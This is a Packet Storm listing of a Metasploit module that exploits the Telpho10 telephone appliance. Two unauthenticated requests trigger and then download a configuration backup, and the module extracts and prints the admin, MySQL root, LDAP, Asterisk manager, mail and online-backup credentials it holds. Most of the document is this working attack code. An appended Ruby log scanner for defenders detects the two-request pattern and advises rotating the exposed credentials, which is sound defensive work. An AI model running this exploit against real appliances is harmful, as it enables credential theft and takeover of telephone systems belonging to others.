
Telpho10 Backup Credentials Dumper
Posted Aug 31, 2024
Authored by Jan Rude | Site metasploit.com

This Metasploit module exploits a vulnerability present in all versions of the Telpho10 telephone system appliance. It generates a configuration backup of Telpho10, downloads the file, and dumps the credentials for admin login, phpmyadmin, phpldapadmin, etc. It has been successfully tested on appliance versions 2.6.31 and 2.6.39.

tags | exploit, telephony
SHA-256 | 94e832c4a55946a0bafe2584caa72b0c8f7a000472011e442c2d49d287911a3f

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Telpho10 Backup Credentials Dumper',
        'Description' => %q{
          This module exploits a vulnerability present in all versions of Telpho10 telephone system
          appliance. This module generates a configuration backup of Telpho10,
          downloads the file and dumps the credentials for admin login,
          phpmyadmin, phpldapadmin, etc.
          This module has been successfully tested on the appliance versions 2.6.31 and 2.6.39.
        },
        'Author' => 'Jan Rude', # Vulnerability Discovery and Metasploit Module
        'License' => MSF_LICENSE,
        # References is a list of [type, value] pairs
        'References' => [
          ['URL', 'https://github.com/whoot/TelpOWN']
        ],
        'Platform' => 'linux',
        'Privileged' => false,
        'DisclosureDate' => '2016-09-02'
      )
    )

    register_options(
      [
        Opt::RPORT(80)
      ]
    )
  end

  # Used for unpacking backup files
  def untar(tarfile)
    destination = tarfile.split('.tar').first
    FileUtils.mkdir_p(destination)
    File.open(tarfile, 'rb') do |file|
      Rex::Tar::Reader.new(file) do |tar|
        tar.each do |entry|
          dest = File.join(destination, File.basename(entry.full_name))
          next unless entry.file?

          File.open(dest, 'wb') do |f|
            f.write(entry.read)
          end
          File.chmod(entry.header.mode, dest)
        end
      end
    end
    return destination
  end

  # search for credentials in backup file
  def dump_creds(mysql_file)
    file = File.new(mysql_file, 'r')
    while (line = file.gets)
      if line.include? 'adminusername'
        config = [line]
      end
    end
    file.close

    print_status('Login (/telpho/login.php)')
    print_status('-------------------------')
    print_good("Username: #{config.first[/adminusername','(.*?)'/, 1]}")
    print_good("Password: #{config.first[/adminpassword','(.*?)'/, 1]}\n")

    print_status('MySQL (/phpmyadmin)')
    print_status('-------------------')
    print_good('Username: root')
    print_good("Password: #{config.first[/dbpassword','(.*?)'/, 1]}\n")

    print_status('LDAP (/phpldapadmin)')
    print_status('--------------------')
    print_good('Username: cn=admin,dc=localdomain')
    print_good("Password: #{config.first[/ldappassword','(.*?)'/, 1]}\n")

    print_status('Asterisk MI (port 5038)')
    print_status('-----------------------')
    print_good("Username: #{config.first[/manageruser','(.*?)'/, 1]}")
    print_good("Password: #{config.first[/managersecret','(.*?)'/, 1]}\n")

    print_status('Mail configuration')
    print_status('------------------')
    print_good("Mailserver: #{config.first[/ipsmarthost','(.*?)'/, 1]}")
    print_good("Username: #{config.first[/mailusername','(.*?)'/, 1]}")
    print_good("Password: #{config.first[/mailpassword','(.*?)'/, 1]}")
    print_good("Mail from: #{config.first[/mailfrom','(.*?)'/, 1]}\n")

    print_status('Online Backup')
    print_status('-------------')
    print_good("ID: #{config.first[/ftpbackupid','(.*?)'/, 1]}")
    print_good("Password: #{config.first[/ftpbackuppw','(.*?)'/, 1]}\n")
  end

  def run
    res = send_request_cgi({
      'uri' => '/telpho/system/backup.php',
      'method' => 'GET'
    })
    if res && res.code == 200
      print_status('Generating backup')
      sleep(1)
    else
      print_error('Could not find vulnerable script. Aborting.')
      return nil
    end

    print_status('Downloading backup')
    res = send_request_cgi({
      'uri' => '/telpho/temp/telpho10.epb',
      'method' => 'GET'
    })
    if res && res.code == 200
      if res.body.to_s.bytesize == 0
        print_error('0 bytes returned, file does not exist or is empty.')
        return nil
      end

      path = store_loot(
        'telpho10.backup',
        'application/x-compressed',
        datastore['RHOST'],
        res.body,
        'backup.tar'
      )
      print_good("File saved in: #{path}")

      begin
        extracted = untar(path.to_s)
        mysql = untar("#{extracted}/mysql.tar")
      rescue StandardError
        print_error('Could not unpack files.')
        return nil
      end
      begin
        print_status("Dumping credentials\n")
        dump_creds("#{mysql}/mysql.epb")
      rescue StandardError
        print_error('Could not find credential file.')
        return nil
      end
    else
      print_error('Failed to download backup file.')
      return nil
    end
  rescue ::Rex::ConnectionError
    print_error("#{rhost}:#{rport} - Failed to connect")
    return nil
  end
end
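
A defender's view of the two requests the module sends, as an added example that is not part of the original module or of the Packet Storm listing: it scans web server access logs for a successful GET of `/telpho/system/backup.php` followed by a successful, non-empty GET of `/telpho/temp/telpho10.epb` from the same client. The Combined Log Format, the 300-second window, the helper names and the sample lines are assumptions constructed for illustration.

```ruby
require 'time'

# Combined Log Format: client, timestamp, request line, status, response size.
LOG_RE = /\A(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) (\d+|-)/
BACKUP_TRIGGER = '/telpho/system/backup.php' # path requested first by the module
BACKUP_FILE    = '/telpho/temp/telpho10.epb' # path the module then downloads
WINDOW_SECONDS = 300                         # assumed correlation window

# Parses one access log line into a hash, or returns nil if it does not match.
def parse_line(line)
  m = LOG_RE.match(line)
  return nil unless m

  { client: m[1], time: Time.strptime(m[2], '%d/%b/%Y:%H:%M:%S %z'),
    method: m[3], path: m[4].split('?').first,
    status: m[5].to_i, bytes: m[6].to_i }
end

# Returns one finding per successful, non-empty backup download that follows a
# successful trigger request from the same client within WINDOW_SECONDS.
def find_backup_dumps(lines)
  last_trigger = {}
  findings = []
  lines.each do |line|
    e = parse_line(line)
    next unless e && e[:method] == 'GET' && e[:status] == 200

    case e[:path]
    when BACKUP_TRIGGER
      last_trigger[e[:client]] = e[:time]
    when BACKUP_FILE
      t = last_trigger[e[:client]]
      next unless t && e[:bytes] > 0 && (e[:time] - t).between?(0, WINDOW_SECONDS)

      findings << { client: e[:client], at: e[:time], bytes: e[:bytes] }
    end
  end
  findings
end

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
  '198.51.100.7 - - [02/Sep/2016:10:00:00 +0000] "GET /telpho/system/backup.php HTTP/1.1" 200 512',
  '198.51.100.7 - - [02/Sep/2016:10:00:01 +0000] "GET /telpho/temp/telpho10.epb HTTP/1.1" 200 1048576',
  '203.0.113.9 - - [02/Sep/2016:10:05:00 +0000] "GET /telpho/temp/telpho10.epb HTTP/1.1" 404 0',
  '203.0.113.20 - - [02/Sep/2016:10:06:00 +0000] "GET /telpho/login.php HTTP/1.1" 200 2048'
].freeze

find_backup_dumps(SAMPLE_LOG).each do |f|
  puts "backup download by #{f[:client]} at #{f[:at].utc.iso8601} (#{f[:bytes]} bytes)"
end
```

A finding means the configuration backup left the appliance, so every credential the module prints (admin login, MySQL, LDAP, Asterisk manager, mail and online backup) should be rotated.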